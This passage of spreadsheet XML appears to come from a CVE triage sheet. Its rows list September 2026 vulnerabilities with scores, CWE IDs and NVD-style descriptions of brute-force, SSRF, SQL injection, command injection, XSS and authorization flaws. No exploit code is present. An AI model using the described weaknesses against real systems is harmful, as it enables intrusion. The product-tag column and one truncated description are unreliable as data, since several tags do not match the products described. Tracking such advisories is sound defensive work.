      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Nginx Proxy Manager through 2.16.0 lacks rate-limiting on authentication endpoints, allowing unauthenticated attackers to make unlimited password guesses against any account. Attackers can brute-force login credentials via POST /api/tokens and subsequently guess TOTP codes via POST /api/tokens/2fa to gain full session access and administrative control.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102334</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82375</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) in Apache Roller 6.1.5 allows an authenticated user with entry-editing rights on a weblog to cause outbound HTTP requests to attacker-chosen destinations through legacy outbound Trackback and entry enclosure handling. The Trackback control is hidden in the standard UI, but its action remains directly reachable; the enclosure path is relevant only when an author supplies an enclosure URL. No non-default server configuration is required, and the default empty Trackback allow-list permits all destinations. Requests can reach loopback and private-network addresses, while enclosure handling exposes response status, content type, and length. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes the outbound trackback action and stops dereferencing enclosure URLs.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82375</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101012</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This impacts an unknown function of the file makeresult.php. This manipulation of the argument makeid causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101012</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101015</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-20</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this issue is some unknown functionality of the file policy.c of the component Domain Handler. Executing a manipulation can lead to improper validation of unsafe equivalence in input. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101015</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101280</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-290</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Trusted Domain Project OpenDMARC up to 1.4.2. Affected is the function opendmarc_policy_query_dmarc of the component Multi-Record Set Handler. The manipulation results in authentication bypass by spoofing. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101280</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101281</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_sp2_find_mailfrom_domain of the file libopendmarc/opendmarc_spf.c of the component SPF Macro Handler. This manipulation causes improper authentication. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: c48a74c758677fc5272a73eff15ffdbf8afda1a6. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101281</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102248</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Rebuild up to 4.4.7/4.5.0-beta5. This affects an unknown part of the file /user/login of the component Login Endpoint. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102248</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12267</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>ManageEngine DDI Central versions below 6201 are vulnerable to Command injection in Windows DNS Query Resolution Policy name field leading to remote code execution.</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12267</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86330</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>An OS command injection flaw was found in the set_hostname_internal function of NooBaa's cluster_internal_api. This component is responsible for managing the Multi-Cloud Object Gateway in OpenShift Data Foundation. The vulnerability occurs because the hostname parameter is passed directly to a shell command without proper sanitization. An authenticated attacker with administrative privileges can provide a specially crafted hostname containing shell metacharacters to execute arbitrary commands on the host system with the privileges of the NooBaa process.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86330</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96326</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>The HT Contact Form – Drag &amp; Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Rich Text Editor Field in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96326</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102335</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>nginx, gin</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>Nginx Proxy Manager through 2.16.0 fails to restrict the advanced_config field to administrators, allowing non-admin users with manage permissions to inject arbitrary nginx directives. Attackers can inject malicious nginx configuration such as alias directives to serve arbitrary files or control routing for their assigned hosts.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102335</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55096</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>fast-mcp-t</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55096</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87114</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>docker, rust</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in kube-compare. When processing a 'container://' reference path, the tool incorrectly executes an untrusted container image's entrypoint instead of merely extracting data from a stopped container. This allows a remote attacker to achieve arbitrary code execution on the operator's workstation. If the Docker daemon requires elevated privileges, the untrusted code may execute with root-mediated daemon privileges, posing a significant security risk.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87114</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93538</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-639</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>A cross-tenant authorization issue was discovered in SUSE Rancher Fleet. During agent-initiated cluster registration, cluster labels supplied by the registering agent, including labels in the reserved management.cattle.io/ namespace such as the cluster display name label, were applied to the resulting upstream Cluster object. Because Fleet resolves GitRepo and Bundle targets from those cluster labels, a party able to register a cluster into a Fleet workspace namespace shared with other tenants could cause its own cluster to satisfy targeting rules that administrators intended for a different cluster.
This affects SUSE Rancher Fleet 0.16 before 0.16.1, 0.15 before 0.15.6, 0.14 before 0.14.10, 0.13 before 0.13.15, 0.12 before 0.12.19 and older versions.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93538</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97685</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>help@fluidattacks.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>An authenticated LimeSurvey Community Edition 7.3.0 user allowed to create surveys can use their own survey as an authorized context while supplying question or answer identifiers belonging to another user's survey. The REST survey-patching endpoint checks the attacker's permission against the survey ID in the request URL, but the vulnerable persistence operations resolve the target object independently by its global qid or aid and never verify that it belongs to that authorized survey.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97685</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100392</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2, Users::form() performs no object-level authorization check on user_id = 1. A Secondary Administrator (user_type = 1, user_id != 1) can rewrite the Primary Administrator's user_type to 2 (Guest / read-only), destroying the root account's privilege and locking the legitimate owner out of the instance. At time of publication, there are no publicly available patches.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100392</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>7</v>
      </c>
